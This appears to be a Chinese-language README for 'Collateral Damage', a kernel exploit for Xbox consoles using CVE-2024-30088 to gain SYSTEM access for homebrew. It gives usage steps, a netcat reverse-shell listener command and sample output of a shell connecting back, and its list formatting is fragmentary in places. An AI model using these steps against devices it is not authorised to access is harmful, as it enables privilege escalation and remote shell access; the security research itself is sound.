Collateral Damage 是一个针对 Xbox SystemOS 的内核漏洞利用,使用了 CVE-2024-30088。 它针对运行内核版本 25398.4478、25398.4908 和 25398.4909 的 Xbox One 和 Xbox Series 主机。初始入口点是 Game Script UWP 应用。
第一阶段载荷、PE 加载器和网络加载器由 Solstice 提供。
此漏洞利用由 Emma Kirkpatrick(漏洞发现与利用)和 Lander Brandt(Solstice)开发。
要将载荷本地放置到 Xbox 主机上,建议使用类似 Adv File Explorer (FullTrust) 的完全信任资源管理器。或者,初始载荷可以通过 USB 键盘模拟器(rubber ducky 等)提供,后续载荷阶段可以通过网络加载。
此处提供的反向 Shell 示例要求你的主机已连接到网络。将主机连接到网络时,请非常小心,避免连接到互联网并进行更新。请尽可能阻止与 Xbox LIVE 的连接,至少将 DNS 设置为无效服务器。
此漏洞利用并非完全可靠。它依赖于 CPU 侧信道以及竞争条件,这两者都有可能失败。如果失败,漏洞利用可能会通过网络输出提醒你,或者主机本身可能会崩溃并重启。
gamescript_autosave_network.txt 或 gamescript_autosave.txt 的第 7 行,使其包含你 PC 的本地 IP。
gamescript_autosave.txt、stage2.bin 和 run.exe 复制到主机上 Game Script 应用的 LocalState 目录(Q:\Users\UserMgr0\AppData\Local\Packages\27878ConstantineTarasenko.458004FD2C47C_c8b3w9r5va522\LocalState\)gamescript_autosave_network.txt 的内容输入到 GameScript 窗口。通过 payload_server_win_x64.exe --stage2 stage2.bin --run run.exe 提供 stage2.bin 和 run.exenc64.exe -lvnp 7070)listening on [any] 7070 ...
connect to [192.168.0.61] from (UNKNOWN) [192.168.0.130] 49665
Collateral Damage - @carrot_c4k3 & @landaire (exploits.forsale)
Build number: 25398.4478
Attempting to find kernel base...
Found likely kernel base: FFFFF80AF9800000
Attempting exploit...
Exploit succeeded! Running payload!
Microsoft Windows [Version 10.0.25398.4478]
Copyright (c) Microsoft Corporation. All rights reserved.
S:\>
要将此工具打造成一个用户友好的、用于在 Xbox 上加载自制软件(homebrew)的工具,还需要大量额外工作,但我希望这能提供一个良好的起点 :) 如果你想尝试以 SYSTEM 身份运行代码,可以将你的代码放在 post_exploit.c 的 post_exploit 函数中。
这方面还有很多工作要做,但既然内核部分已经完成,我想与社区分享,以便开发人员可以开始以 SYSTEM 权限进行探索。以下是我仍希望在未来添加的一些功能:
欢迎提供更多想法 :)
感谢所有在这一过程中帮助我集思广益、分享知识和时间的人!!!以下是我想要感谢的一些人: